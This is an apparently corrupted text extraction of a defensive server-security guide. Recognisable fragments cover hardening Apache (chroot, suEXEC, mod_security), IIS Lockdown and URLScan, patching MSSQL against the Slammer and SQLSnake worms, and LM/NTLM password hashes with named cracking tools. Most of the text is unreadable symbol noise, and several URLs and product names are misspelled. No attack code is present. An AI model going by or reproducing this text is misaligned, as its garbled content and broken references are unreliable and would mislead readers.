)„ 2 0, MR / # 0,6j 5 0 B 2 MOD_DIR)MOD_AUTOINDEX 47 1, , Q 0,< +' APACHE 1.3.19 2 <+ 2#5 1) ,< 8000 " 4 ? ? ! $ B B3 PERL B 5/ 2 - " ? 5$ /CGI-BIN///////////////////////////////////////////////////S 7) Y ;! MARTIN KREAMER - '4j 4)- " ,G < 93 @ APACHE ? % , 6, j 5 ? " 3 O) ) , - Y , 1 )„ N MR/ ) 1 [ROHAN APACHE]$./CONFIGURE –DISABLE-MODULE=DIRDISABLE-MODULE=AUTOINDEX APACHE 2 , 60 # ', 6 3 B H" 6 Y 0, Y1* $ , ? ? ) B) - " 1Q 2 P10 3 <8 6 6 BH 2 , ,F ,< 1 2001 c F n 9 , $ APACHE 0 1 " ,< 6 3 P . ,Y (5 [ \X 1 ,6 * -,< e ! '? B , 1NETCAT 6 PASSWORD % '? 
56c / " ) F 3 B 5/ 2 0,< A & BUGTRAQ 0, < -, @ # 2 O) , " KEVINb , a,6 j 5 B APACHE)MULTIVIEWS R4 S @ ) ) X ,4 BRASSCONNON.NET " ,< 4 , -" F ?), APACHE0 $ ) " MOD-DIRT)„ MR / 2 F) 3 P 1 ,< 6) 6 \ 2 B' R4 S @ 2 0,< 0,6 MULTIVIEW ' ? B - , P - ) X g B'0, - N`6 , P$, < V4 ?) 2 O) ? , 6 G 5 # " H) 6 2 \' 21 ) 0 < - 3• B' 6)$ ? 1 0,< ?P 4 * $ 5 ,H R 4 S @0,< < F) @ ?) 6 % H 6 ) B) , ,, h / 6- MOD_AUTH_*SQL j P( <) STUTTGART- N ?) _¤] 7 , 2 P 10, < 0 iX SQL -" F ? " RUS-CERT,2001 1 )„ 4 2 56) < 6" / ?@ 2 0 - 6 3 ;. %LY @ 6" / N N R N F O) , " 9 -, @ 3 \X MOD_AUTH_*SQL • ("c P 10, ") 0, , APACHE , R4 S @ d * - . W L3 a - Y ! ". /0(123& ("c 7 !89 S ) 6h @ " ? $ " 6 @ I5 4@ O) -, 6 APACHE 1.3.X h @" ? 1 2 " U4 +$ U) @ MOD_AUTH_*SQL - Y ", - - ) SQL P< • : HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-13 h @" ? APACHE 2.0.X HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-20 ) R4 S @ d * " - Y 0, <P 0 ,Y - . I 5 ("c '7 !89 G X) Z W K a 6h @ ("c 7 4 & HTTP://HTTPD.APACHE.ORG/a h @ "2 APACHE O) -, 6 U ) 0 L3 $-,< - < "7 K 4$ "7 " 4@ O) -, 6 U ) 4$ DY/ B <) DY/ I 5 4@ O) 2 3@ SL " ? 59…w HTTP://HTTPD.APACHE.ORG/h @ " ? 5 - Y levels PATCH) 6 * h @" ? 4@ : GX) 2 3@ " 2 6@ Q CODE SOURCE 6* … I5 I … 0 5 - Y HTTP://WWW.APACHE.ORG/DIST/HTTPD/PATCHES/ ? @ " +F ? ! . I 4@ % ! ) X - < R4 S @ ^ 1 )„ C' # 2 " $ . - "2 % 5 0, 5 6-" $ -, 6 U ) O F$ 4 0 ? G “/“ - Y G', % ' 5 -,6 6 c H, ), . $ l ' ( : ?@ ), . -)8!0 0, @ # 0 5 ?@ '# ,6 * 6U ) H CHROOT/HTTPD| 0 LOGIN SESSION " 5 ) ?# $, 5 " g@ 3 6- Y Z 6- Y # 6 ' ) -, < -, F W L3 $l ' 3 6j* G', c 2#5 $ ) -,< -, 3 'SHELL ", 8Q0, C L 3 'SHELL 15 / - Y Z E /CHROOT 1G') Z F CHROOTED 7 S 2#5 $ $ , 6 F W L3 4@ F) CHROOT " z 3 ) % ! 15 / F 3 < 4@ -, 6 U ) F CHROOT b . 8Q0 C ) F & 7 I ) G ; ! CHROOT CHROOT0 5< l '-) B 4$ CHROOT…‹ ,E = ,4 2 W 3 ^ P> F ) ROOT ? G, F " …s E " E %H ,/ W 3 6) - ),. ,E = G ;! ) #B 5! 4@ 0 < ,6 * / 0 - Y - 5 - Y _CA-2002-23] OPENSSL ) , ) X 4@ 2 5 MOD_SSL(CA-2002-27) ( % I 2, F ("c : ("c0, 0 ) !PATCHING " ? 
59…p ,B F S 4@ 2, 0 < ,6 * 5 ? G0 5 ? G0 H CHROOT E E 15 / /BIN/SKY 4@ CHROOTING ) !89 , " ?@ I5 <& $ CGI,PHP 6 6U) ,G +P - ^ P 6 A) 0,< < TP, &'( 7, 3 ?@ # P ) "E 6 ,' 1G'\ 6% 6 •c 4) 6 S , ?# $ S !89 , ) BH$ @ R3 4@ -, 6 U ) 0 '#< ) [ 6 '$ -, 6 U ) < $ , 5 ' K LOGGING 0, 5 (E 2, 0 < I 5 …Š ) -, 6 U ) ("c 2 40 6% ' + K W L3 ?# " W 3 I ) 1 )„ F) CHROOTING < B K LOGGING 7 B 5! g * ("c 7 , 5 ? @ &1 R 4 M :G H 9P ("c$ O) -, 6 U ) 2#5 F %K W L3 I 6 #6 -, 6 U ) W L3 c ("c P F7 [ , b. F 3 - Y $ 9 1G'W L3 ("c 0, 5 B : I 5 O) -, 6 U ) ? G$ I ) # 2 : 6% ' 7 L g ' ) F 7 !89 a,< ,6 3 6 '? @ a 5 - Y "+ " , •c 7) Y h @ " APACHE 6 ' ) <@ I5 1.3.X … < HTTP://HTTPD.APACHE.ORG/DOCS/LOGS.HTML APACHE HTTP://HTTPD.APACHE.ORG/DOCS2.0/LOGS.HTML2.0.X - Y 0 < •c P ) F 6% ' . 2#5 -, @ j 4 ^ < ) CGI,PHP " 6 „ 1# &1@ ? j &' I 5 ? •c0 5 POST,GET ^ MOD_SECURITY n 9 " , 6•c F # ) ) )Y l ' GX)0,<P ' ,, $ - Y # P [ ( ,H $ =GX " - Y Z POST ) GET bP 7 B 5! ? 5 0 R4 7 _DETECTIOMN INTRUDER] 2 5/& d * l' 0, 5 N 4 K F O) S W L3 j< 4 " $MODSECURITY0, 5 U) MODSECURITY ) ("c 6 < 6 'O) N 4 ) ,< O) -, 6 U ) 6 ^P - 56 F 0, 5 5/ " 4@ -, 6 -HTTP://WWW.MODSECURITY.ORG/ •-HTTP://WWW.SECURITYFOCUS/17064.152.44.126%20152.44.12 6 ) SSI,CGI,PHP…• # a ,F ) X # N ], K5 TG' g 4 # I ,! T G' g 2 < F) ? @ : SERVER SIDE INCLUDES ", 3 : ) SSI,CGI,PHP… 6? " _,< Z " 6, F ;! ) , 6 '-, 6 U ) SSI… " - Y 0, K5 ) SSI,CGI,PHP " # 6? " # F ? # $SUEXEC0 < - Y SUEXEC " 6 ' APACHE USER ID H ^ , 5 6 ' USER ID , 6 3 MR /$ ? 5F 7 7, , S b , < ("c j SETUPID ROOT , 4@ . . CGI)SSI L 3 CGI)SSI ) 6 @ 3 <) S SUEXEC " - Y ) / 0, 5 6 F 3 ' 6 F) , # 4 (,! #B 5! - . ) 6- Y/ ") <@ - Y ;! I ) : a 5 - Y a < - Y 6 SUEXEC " -,Y 0, < ( 0,< ,6 3 N h @" ? - Y 2 , 0, < O ) -, 6 U ) -, < < P - 5 ?# 2 SUEXEC 4@ ? … $ USER ID % P 7) Y USER ID 2 < ? # ) j6 ) X # " h @ " APACHE 1.3.X 3 2 " 6 … HTTP://HTTPD.APACHE.ORG/DOCS/SUEXEC.HTML a < " h @ " APACHE 2.0.X - Y … HTTP://HTTPD.APACHE.ORG/DOCS-2.0/SUEXEC.HTML ) CGI-BIN % < , MR/$ 5 e 'j 4 6 . 
W L3 # 5 ("c … ("c ) ( E 6 # PHP " ) - z 3 1 2 B / " S1: a 0 HTTP HEADER F - < W L3 2 7 !89 K ;! SAFE 1/ h @ " ? W l '\ X L3 2 23 5 ) K6 PHP 25 4 C ' 4 ? 5 TG' g… F " ? 59 T L/… B5# 7 !89 ' HTTP://WWW.SECURITYFOCUS.COM/PRINTABLE/INFOCUS/1706 T)„ 8Q 0 G X) XSS:CROSS SITE " ? W L3 2 P % I 'X ) … MOD_SECURITY DY/ ; ! , B5# 7 !89 -,6 1 )„ " - Y 0 < SCRIPTING <@ 0 5 - Y HTTP://MODSECURITY.ORG/ h @ SQL INJECTION &XSS % < R 4 S @ ^ ( 0 5 - Y h @ 2 P h ,G 6 6 & " ? : ) &5 … 0 56 &K/ & H]NIKTO & % " 2 # ' # _HTTP://WWW.CIRT.NET/CODE/NIKTO.SHTML 0 CGI ) j 4 6& R Y 9f 
)j 4 ("c 5 - Y % H l ' & 0, 5 ' & * I 2 3@ 0, -,< K Patch 2 3@ ) b 6 K XP < " # - Y IIS - 56 PHP ("c 0 5 SL IIS -, < 'X 6 : Patch % < $ ' ) # ' ) # (N K http://www.microsft.com/technet/security/tools.hfnetchk.asp ) Perliis, CouldDusion " ' ! "), ) ) pqqq "), ) NT 4.0 "), ) ) 0 6Patch Checker Network Security Hotfix (HFNetchk) ? , F 456 123& 5 ( N $-, < K - Y F # O B : -18 9 Patch # 7"! & 1 ) Patching 0 -, < S L -, 6 U ) ) ) ( N6 K6A) " ! " %& IIS DY/ 6 $ #P< ? , 0, @ %5G - Y IIS " - Y i: Z IIS ,< -, < ( E -,< K 6 < " (N P ) GF l '7c L. 6 F 6U ) ) Windows -, < 'X 7c L. g] -,< 'X 7c L. " ( N6 bP ? , 0, 6 ( E - (#=% ! & 2> Lockdown IIS :; < & ? @ ) ("c 6 ("c ) - P 3 15 IIS IIS &) IIS SL K h @" ? 0 5 F 25 I * 0 - & < ') # Lockdown -, . com/technet/security/tools/locktool.asphttp://www.microsoft ' 3 I SL " 7 : Expert u? "7 u?# S ) Custom 1/ l' F IIS SL 2, 0 5 d * ^P 6 'IIS a ?@ F) 5< I N ] WebDAV ? 5 TG' g • b. # _,< Printer, ism. a I ] ) X g < " $O) . 6ISAPI extensions ? 5 TG' g • _Idq, htr IIS - 56 -,< K b C 5! T) , 5 7 - 3 ) Code Blue HTTP 0, < 6, " ? URLScan ? @ A" 4 " % PH K6 ) cmd.exe 27 ? 2 & @ 2> I IIS R4 S @ ^ 6 3 I] 1 ) K LLS Lockdown. . 15 bP 785/ " 7 L * 2 ` A R4 (,! ;! &) - 5 l ' " ,G 6, " Code Red 85/] , 5 5 - Y , #4 0, < -, 6 U ) http://www.microsoft ah @ " 0 - Y ?5F URLSean B'0_Buffer Ovrflow \ " 3 + • Z&F " O) -, 6 U ) 0_tftp. 
-HTTP + , 5 MR/ • 6 N b ?@ ? ' & com/technet/security/tools/locktool.asp R4 S @ : 2 ) Microsoft SQL Server (MSSQL) _MSSQL] ' ) # , F R 4 S @ : 2, - 9 *5 ) !89 3 0, 5 7 . 6 ' ? 5F 2#5 & -, 6 U ) 3 M, 6 F / 7 !89 i. R4 S @ ^ -, < = ' ?# SQL ? , 6 U ) b ? & MSSQL ( 5! W 3 F - Y u $h SQL -, 6 U ) , 7 / 23 , # 4 (, ! % 1 , )W 3 0, HS @), , e 6=GX " ! ?@)- G ?5F SQL- Slammer/ Spida Hell/ Sapphire ) SQLSnake/ Spida ( ) 0, 5 ) - Y MSSQL -, < 3 < =GX ^ 3 ?1 ( E l ' R4 S @ : 2' , F F E F) Tu<] , 6( : - " _pqqs ) pqqp T ] - 785/ 6 1 @A I 0_T " -,< TG'] SQLSnade/ Spida ( b. , 6h @ ) + : , - 1 @ ? & 0, 6 #P < ' $ R4 S @ ' a 5 - Y aMay 2002] l ' 6( j &' Kc ,/ B5# 7 !89 ? " 7, 6 4" " ? K c $l ' B5# 7 !89 • http: //isc. Incidents. Org/ ang lysis. Html? Id= 157 • http: //www.eeye. com/ html/ Research/ Advisories/ AL20020522. Html. • http: //www.cert. org/ incident- notes/IN-2002-04. Html. T G'] SQL-Slammer/SQL-Hell/Sapphire ( : B5# 7 !89 aJanuary 2003 v • http: //isc. Incidents. Org/ analysis. Html? =157 • http: //www.nextgenss. com/ advisories/ mssql-udp. Txt • http: //www.eeye. AL20030125. Html com/ html/ Research/flash/ -,< • http: //www.cert. org/advisories/ CA-2003-04. Html ) wxss 4 Internet Storm Center b 67 K67 4 B 5F " _MSSQL -, 6 U ) ,< 0 , #4 " ? 59 T L/ 0, 2 0 I5 F DY/ , ( , H ? @ ? 5 T G' g sa Account " ? 6 " ) h, / - P 6) ( E : " %# T 0, 5 " # 6 2< ) U) ) 6 $l '( % N 4$ gatway \ ' A) 2 # N 7 UDP ^ 0_-,< - < 7 4 ' L /] , < %# H wxsx 7 bP #4 4y !89 F 3 H, , e G ) I Z F MSDE ? @ ) \X !89 ? ,6 Patching 6j 4 7 L z) 3 ) ) ) -" F] _ SQL -, 6 U ) 6 F SQL bP MSDE 2000, Microsoft Server 2000 Deskrop Engine ,G 0 ' !89 1 @),, e G ("c 7 ,H 5 B') 6 #B 5! 5 l ' GH ) h 0 ' ,6 3 , -, < K 7 , 3& @,, 0 [ I5 ) -,< N wxsx 7 4 5 0, 5 ' Resolution Service Overflow Stack Buffer \ 2 ), < ? SQL Slammer ( 2 6 & 3 account ?@ " h "?& R4 S @ ,L K6U ) I SF l 'Buffer Overflow 0 ( ,H ( " : Sa Account 0 5 P !& Buffer Overflow _% 5/] A bP B5# 7 !89 - . _0 < 5 - Y SQL/MSDE Z F SQL Server .. 
0 < 5 - Y I -, ` 4 P !& account ^ K7 L #B 5! - . Null _,< - Y Chang the SQL Sevr Admininistror Login h @ ?@ d * b SQLSnake ( N , ) 67 4] wxsx 25F , account ("c : " # e 'j 4 H _ '#< - N] sa account] e 'j 4 0 -, < K A & h #P < 6 #B 5! "] SQL Lite Server ? G ? 2 P / ?P / " " -, < S L Server SQL " * ) 6 @, < ) 7c L. - 56 Z&F " ? @) # ? G MSDE 2000 0, , P a • *< SL " SQL/ MSDE Server 2000 (Developer, Sradard and Enterprise Editions) • Visral Studio. NET (Architect, Developer and professional Editions) • ASP. NET Web Matrix Tool • Office XP • Access 2002 • Visral Fox Pro 7.0/8.0 0, 5 , -Y , 6 3 SQL/MSDE -, 6 U ) #40 = B* 6A) " - Y 8Q 0 < C A " - Y $? , H? , _TCP 7 0_ F) & -, < - < wxsx 7 wxss 7 4 / 9 -, - 0, TL 4 $pqqq MSDE F UDP &1 # ?), # Overflow Buffer ^ 4 U) 60 ? , d* ") GX) $, < , 6 3 ( E UDP h 6 ;! $,< )- %L ?@ UDP U) ^ 0 $-, 6 U ) -, < ? , X02 0, < " * A) " I ' ,6 3A wxsx 7 4 ) !89 K6 $ ( 4 #4 NAMED PIPES ) l '7 4 0 3 l ' , 6" - Y ? # ] , ? ! l '7 6 L ? ? , #) ) TL - . T !89 $ ( E 4" - Y pqqqMSDE !89 56MSDE ) SQL -, 6 U ) y 6567 # b & ?@ N? 4] Session NetBIOS 4 xxr|ws{ 7 ^ ,K U) # R4 S @ ^ ( E U) TCP U) 6? G MSDE " l ' 6 &'( !89 !89 3 : F) -, 6 U ) \ 2 " 785/ 6, " # ?@ F pqqqMSDE ' 6-" Z F System Local ,L account ^ , 4 # " I ' ] 0,< ,6 3 ) User Domain $ F 6- Y/ " & @ 0,6 ,L Overflow Buffer ) - Y ,L , , j6 F ("c 5 $ nH Critical Update a I ! ' R4 S @ 7 K &F &1 @ ) K <@ ' - Y _, H , , ) - 9* e G 6& " - Y ) ' 0 5 ( N6 [ 0 5 - Y Incidents.org h @ " ? - Y $, 5 ? @- 6% '7 "), ) Microfoft SQL /MSDE Desktop Engine " ,F 7 0,< ,6 3 N : ) 8 ( 6& " h @n ^ +, 6* " 6 6) , < -, < SL 2000 &'( HS @),, 2 e G 2 l' ) pqqq SQL/MSDE Server7.0 $, 5 + K K Kit Microsoft SQL $ SQL/MSDE 56 - Y - Y $, 5 0, 5 - $() * SQL/MSDE Server, F , # 4 ) Patching " 5 % < 6 #P < ) Domain ( 5 ? 6 ^ " SQL Slammer # , # 4 ) Patching " 5 nH 3) l ' F ! 5E - Y MSDE 2000 ! ". /0(123& ') # < 9" ? http://www.microsoft.com/sql/downloads/securitytools.asp ? 
@ SQL Critical Update Kit $-,< K Toolkit 0 5 , 4 6 & % < ) -,< -, & SqlSecurity.com 0 SQL Critical Update ) SQL Scan !89 - K 5 $, 6 $l ' & 0 )? & A ^ UDP1434 7 4 wxsx 7 SQL Pingv2.2 ( 4 _X02 SQL ? , 6 U ) & : 2 UDP , ] 0, 5 I T Subnet ) * - 5< I SQL Scan Microsoft 0 ^P !89 ) - l ' &'( #B 5! 0, 5 TP ("c v 4 ?@ (8! ! " %& "7 B 5! $l ' R4 S @ : % 9 456 123& 6 DY/ I a K5 GDEFE UDP C 2A SQL/MSDE Monitor Service ? 2A& A * AB • -, < K 6 S @ : ) BH " - Y ) SL MSDE 2000 ?), ) ) - " ) - Y UDP n 9 " F User & @ b ) %L 6 O* 'L 7 T ( ,H $ )- #P< #P< ) 6-" 1 @ " U4 F SB #P < ) ^ account 2#5 F &1 e G O* 'L 7 R4 N`6 0 <; ! ) Domain 6- Y/ " 0,6 UDP 1434 7 4 ,L 0, 5 6 0, 5 T s}~ IP !89 6h @ 0 ? 5 TG' g ] Dos \ " F _U ) 7 B 5! MSDE SQL/MSDE 1 , I SQL/MSDE -, 6 U ) F 4 # " I' ' $l '( ' " MB/Sec - E 4 " j - 1 @ 2< 0 ,K 3 I F I Ms-SQL/MSDE Slammer ( !89 Multicast \ " $, n . $W , $ ,L s}~ % < , 6 3 j &' -, 6 U ) FSystem Local ' - Y $, 3(E Buffer Overflow , MSDE2000 H , , ) - 9* e G $ $l ' 0 5 SQL Pack 3a Server 2000 - 56 F ' n 9" ( ,H ? ( E ?# C 85! ) W L 3 + : $-,< P [ 7< & h 0,< ,6 3 3 #P < Pack Service # 7"+ H ; • Pack Service 6* 2 3@ G2000 a" , SQL/MSDE Server 7.0 Service Pack 4 Pack 3a MSDE/SQL Server 2000 Service P ! G Pack Service # A 7" I A1A 8 9 Patch # 7"+ H ; U) 6* b 5 -, < K 6Patch 2 3@ " -,< K - Y " 6h @ " ? I SQL/MSDE/MSDE -, 6 21 " ? F Patch 2 3@ SL " ? 59 a 6@ I 0 5 - Y ') # SQL/MSDE -, 6 U ) : SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000(MSDE 2000) MSDE 9 <+ &H J K 7 + ,Patch + H ; • Patch # 7" I L2 Tasks Elevation of Privilege in SQL/MSDE Server 'G " U 4 G A &1A 8 Patch ? $ Web MS02-061 I 0 -, a 5 - Y K " "2 9 -,< K Patch 2 3@ " 6h @ " ? 6 @ ) ? 59 SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000(MSDE 2000) MSDE I GPack Service # A 7" I A1A 8 A 9 Patch # A 7"+ H A ; • -, 6 U ) 6* - Y b ' ) # -, 6 U ) 5 -, < K -, < K 6Patch 2 3@ " 21 " ? SQL/MSDE/MSDE F Patch 2 3@ S L " ? 
59 : a - Y " 6 @ I 0 5 SQL/MSDE 6h @ " ? SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000 (MSDE 2000) MSDE Patch # 7" I A 9 M2 <+ &H J K 7 + ,Patch + H ; • Tasks Elevation of Privilege in SQL/MSDE Server 'G " U 4 G A &1A 8 Patch ? $ Web MS02-061 I 0 -, K "2 9 I 0 -, a 5 - Y K " Patch 2 3@ " 6 @ ) ? 59 -,< K Patch 2 3@ " 6 @ ) ? 59 "2 9 6h @ " ? SQL/MSDE Server 7.0 Microsoft SQL Server 2000 Microsoft Server Desktop Engine 2000( MSDE 2000) MSDE C 5! l '? # GAuthentication Logging SQL Server ? 2A& A *• Enterprise Manager 785/ 2 1 ), _sa” ( " n 9" ? # G ;NA 8 A sa Account # 0 , F, , e G j * $, < -, < K 7 4" Server Book Online sa Account P !& ? " - Y O%A • 1A, I A+ 3 _blank] # $ MSSQL/MSDE P !& SQL/MSDE -,< DY/ P !& ("c 0 < , 63 H Administrator (SA) Login System 2t 5: W L3 ("c ? 59 - Y SQL/MSDE SQL/MSDE -, 6 U ) 0_ TG' g 5 ( ,H 2 ^ - Y l 'account " 9 K 7, 5 0 _Server Properties Security ] , account " -, < 3 <] e 'j 4 ^ ?@ ? 5 TG' I R4 7 ) X ("c /] 0 7 ,H the SQL Server Administrator Login j * ) ' ) # % & $, 5 MSDN / 5 -, < and Change the System Administrator Password by Using ) $ Changing ) , #4 I -,< K 6 ) 7 # 2 3@ " ? MSDE Verify 0 5 - Y $sa Account S I MSSQL/MSDE I A U) 4 : Domain ? 2 ! ] Z F^ B . 7" ) _NT "), ) 6 56 A 6 A• GSQL/MSDE Server Agent 1A, . $ SQL/MSDE Server Agent ) -, 6 U ) ] Local System ) A AM2A C A ? &A I 7" ] SYSTEM S @e G U) %H , / MSSQL/MSDE account Valid ) administrator domain 0 _XP ) pqqq "), ) 0 ,6 3 #P< ) % T ?# F Z F Domain $ a 4 " : 2 auditing ) Windows NT Authentication ? 5 T G' U) $-, < F 7 #< )& @ MSSQL/MSDEServer 0, K5 T G' ? @ C, E ) = H " , 6( E N 6Login ' ? , U) , #4$? # 0, 5 - Y Authentication NT #P< " g 6- ),. F) 3 ) : y B'0 ) ) 7c L W L3 R4 7 W 3 TCP/UDP ;! , ? , 6U) ^ P P 6 ("c 6U ) 4" F 3 67 4" N 4 ( E bP ) MSSQL "E $ SQL/MSDE -, 6 U ) " 67 4 z) 3 ) ) ) ) B 3 ? 
5F G5 SQL/MSDE 4 ("c # B' 0 B' G5 ) R4 S @ % y y wxss ) wxsx $, < wxsx ) wxss - Y ^ 1 @)j 0 ^ !89 $ (E 25 " - Y TCP/UDP l ' 67 4 " 6 @ a 5 - Y I " - Microsoft SQL/ MSDE Server 7.0 Security - Microsoft SQL/ MSDE Server 2000 Seurity 6h @ " ? ! " % &# 2 Windows Authentiction % G 6 6A) ? 6, ) Q0 b f -, < - ) 6 '-,< d * + " - Y + " - Y DZ 0 N` 6?), ) " U 4 ? 5F ) " )- 6% 6account # - 5 account , N ) = G0 < ( #. " I' H ?@ =GX P !& u -)8! /) + ,6 3 F) 2 3- Y R 0,< ? " H % ! 3\P ? " + P! F) , B 5! $ ) X a P !& < ,K , 75I € P ! & ,H ' ) = GX F 6 1G'( E 6, 4 , 4" 2 1 ), ) 2 5 ,6 3 < 6(& # " - Y ] -,< , K ? + $ 0 - 6 \ ' i: 2 1 ) E -,< 2), S @^ ,K •c $ P ! & ,H ' ) = GX account -, < K : ) -, ,6 3 = 9P ? @" 0 H , F7 , , e G < TP, ,F , , , b SB ' !89 F ) -, < = G U 4 0, < F ) , K " U4 ? @] 0,< _0 2 , K " U4 0 < ,6 3 N 1G' # , " - Y )? 6" E ) 7 " S[ ?@ 0, 6 6 1G'$ , -,< H _7) Y & P P! & ) % ' DY/ I ? ?# ? P! & 2 P ! & 2' - "E 5 $ / C 5 ?@ ?@? 6A) $ !89 6& H -, < - ?@ ) ) T) , P ! + , K " P !& 6& " ? P !& ? " 9 P ! % <& ^P R4 -,< = G Account • S DY/ (, ! • 0-,< = G , account E ?# $ F = GX 6 &'( 0, 5 4 5! , B hashing 5 N1 " -, < & ) ) , \ 2 P - F) 2 , 5 ,H 6& " - Y 0 2 ), 5 0, 5 P !& ? 5 T 0 < X ,K + " S ) ( #. 3 1 ) GP 2 W L3 6& "), ) _hashing 6 *1 E/ F) , K _ " Hash , [ 19 a " N1\ ) 6 F Hash , D " ("c ("c P ! I5 $ P !& DY/ = G 7 L , - 3• P! & message digest] - , <R ?# # b E _ < $hash , -,< 3 < 0_ P! & d • 6 E 0 ?@ -,6 ) - 3•M Y< - Y ? N1] b )d* 7 ) P ! & ,H ') )- / SB g 0 < ,6 3 ?@ h 83 ( 'hash , , Hashe , 6' P ! & Hashing N& ] 3 ) -, < N $-, @ %5G1 P • )% ! 5 "), ) 5 ] LM • NTLM • _ 5 LM] Lan Manager] " LM -, < Hash ^ XP, 2000 , "), ) LM # F 0, 5 " " 7, 5 #< $ F $, < P ! 6& - 3•_ B . 7 P LM , ( #. 6 &' * 7 , H -, %#< 2 , B G' 6 # ) P 5 ] NTLMv2 • ) ) X "), ) B G' 6b. Q # e 'j 4 7 L _ < NTLM, ] ' ) # #< - 5/ " , ] NT GX) pqqs "), ) N& T, " - Y _NTLMv2 6& $, 5 ) 7 ,H 1 ), & LANMAN Hashes] = GX S 5 P ! Z# L "), ) P ! 
6& /, ) W 3 K6A) " - Y Y6 0,< , 6 3 HttpL://www.msdn.miscrosoft.com/library/default.asp?utl=/library/e n-us/security/securiy/h-gly.asp " % c, LM hashes =GX a 0, < 0, < % ,P - $ 13 0, d * &E 7 B 5! Y6 H F P Qf ) , 5 ! 5E ) 2, ) Hashe d * d * & _dictionary- style] P @ hashing LM A ) 2 6 < 0 Lan , K , @ 'SAM Lmhashes " )? , ?@ ) K62< A) % HS %H , / 0, < P !& - "), ) 2 )d * ? H F 6& • Ih / 0, 2 F 6 F - 3• :3 ) , , ,F -)8! 0 ,6 3 e 'j 4 7 L ) SB g Manager # ("c 0 N1" - Y 6- H$ ' R4 -, < S L I 5 hashes LM = GX T , K, @ ' ? ) 6 '_ , ' )n. R4 S @ LM hashes A) " - Y 5! ? P ! K6 < \X - < # 2 6 F K6 < 2 5 ) ,K 5 P ! , ` 4 0,< ,6 3 6 ' P !& U) 5 hash 6& • P !& d * , 6 3 -, < 2 5 > ?@ )- 5 b P ! - H, , e G -, 6 U ) 7 B 5! $, < # 6& • 0, -, < % , P • & M) / Y6% < C ' )- P ! -,< , K / S 5 ,< #< C /8: 6& • _cracking] ),. R 3 ) l '7 B 5! % 5# S P ! hashing , @ ' 6 F 6 ?# S j &'Hash T 9 P Y6j* ) C ' + >'" - Y % ,P• & M) / C 5 0, & ),. !89 5 2 <] +5 l 0 ,6 3 Y , 4 CG:H ) ?# C 85! P! 6& ? )@ GX) , - $() * 0, H,, 2 e G "), ) + 0 H F U) )- 5 V & ( #. - Y " 6@ 6 5 - < %B !)%c " # % / 0 5 - Y 1 ) $, -, ?@ # 2 " E ' B . " ) 0 ' ,6 3 #P< !89 2 C,E ,6 3 S @ e G $,< - 5 ) , 5 ,H " : 2 P! & 0, < P ! - 3• B . ) • Bc, # < F) -, 6 U ) ( ,H 62 < " \ 2 ! " 6& % E I 5 ("c #B 5! . - Y • 0 " - Y = GX 0 2000. NT "), ) # 4 ) - 5 LM hashes T <% K6 H F P, K , " HS @e G 6" E "2 0 LM -,< P ! & -, 6 - 3• # ) " I ' e 'j 4 7 L Lan Manager hahes I5 ? " b ,< ? , " ("c a , -,< SL e 'j 4 7 L XP, K6 P ! ?5F t6 F) C 8Q ) ("c 5 $ LAN Manager hash ^P # ZF 5 John the Ripper ) _LC44 ] 10phtcrack version " ? " 5 TG' 6Account 6 &'( ?@ 6* ! ". /0(123& , I 5 6A) 2 P " R 3 ?), 0, : 3? " 6& cracking P ! d * P ! & =GX +, ,6 3 E 456 123& \ '2 P )2 6%5G1 %5 ) ( #. " ? 59 #. I5 ? @ a - 2N + ,P QR & Q;3 4 ? L• P! & 6? ' T /2 ! ' ? "W L3 )S )- 6A) " - Y P ! & -, 6 d * A) # F 6 SB g 0 0, 5 ], < 2 " \ 2 0, < _?@ =B* : %5 P ! Y _password] , 5 P ! 6& O* # M /2 1 ) 2' ] ) , " <P?@ ,1 P " P ! M) / % , P ( ,H ?@ _ ("c 2 ? !7 P ! 
'L #) h c 9 < )@ ] -,< F " &N F 5B 6 E H? _ 7 - -J) ("c 0 < (E " ) -,< - 1 ) K5 - 3• I ? K6 5 $O 3 & # 2 ? " 2 ), " U4 _ , P4 H& password d * 6& - <& 2 ? ) P 785/ ?, < F H I T \X W 3 - 3•" M,6] ,<P %# I 5 ("c %5G1 $-, < = G ( O %5 P !& " P ("c A" @ ? 3 # / ) KP Y1M) / " ! - 5 MR / 5B ? @d * 6& " O* , M) / P ! % ) 5B ) " )@ M) / ) KP Y1M) / " * 6 " , 6 3 785/ 3? 5F E ) O * W L3 B' ( -,< & %#< " ,G0 )- < 6 ?@ -J ) M) / ) , ! -,< 3 < ( 0 <- N& " - Y ) ,G I5 ) - 5 0,< ,6 3 crack 0, < -,< h PH ),/ P !& " -J ) = G password ) - P A) " <) " ,< -,< 3 < 5B 3 & 7 B 5! $& @ P 785/ P 6%#< % -,< Y ? @ 0, 5 = G N F2 P <" @ 6? " 6& password ( C ' P !& d * N F- 5 S ("c 0 5 crack 2 -, < 3 < • ,G = G - . W L3 Q # # 7 5B -, < & P! & ? (E - Y Hl ' 6 &' * " - Y T#< A" @ ) S 9* & " ) - 3• P ! 6& (8! 6%5G1 T 5! " U 4 " ? P! , 5 ,H 6& Local . I5 2 PF 62 ) " & 2 pqqs $XP $pqqq"), ) 0 6& I 5 "), ) ) 4 " ? 59 6* )- Y Q " 0, < $ ? b 6 " ? & : - Y -,< ? 7 u j &' -,< = G I5 -,6 a 5 TG' Securty Policy Local Security Policy Program Start Pr ograms Ad min istrativeTools Local Security Policy Select: Account Policies, Then password Policy a ? 5 TG' Password must meet complexity requirements $l ' ? " , ` 4 ) ( #. m .1 -, < = G I5 P! F 6 , ! 6& $ 1/ 2 account ( " 0,< * 0,< a,< " ! 5E " -) (&B 0, < a, % 5 ? ?@ " ) = G " U4 ) 3 B P H " P ! (, ! W L3 ? 5 P !& K6 % < P !& _Z A] B N P Y1• & M) / • _z a] B N PY1 q M) / • 6 H ] 6,6 _ %,µ, s/ ,! C 8Q] KP Y1 g , " 5 $ P !& j< %H ,/ " P! & u ) E E )(5 % < _{ U4 • Policy Local Security " 75 I 4(H • • 6 SB g apassword history (range: 0-24 Enforce) B P H P! & ?56C,E $ 3 5 d* 6& " - Y ? "E ? ("c ? 59 #P< ? , $S P !& " - Y v $l ' Z> " " - Y 0, 5 - Y $, ,F -,< = G P ! & 2, 2 , 0, < , ,F GX) \X ,N 2 ) - )@ I 0,< , ? b < TP, , # 4 " U4 B '8 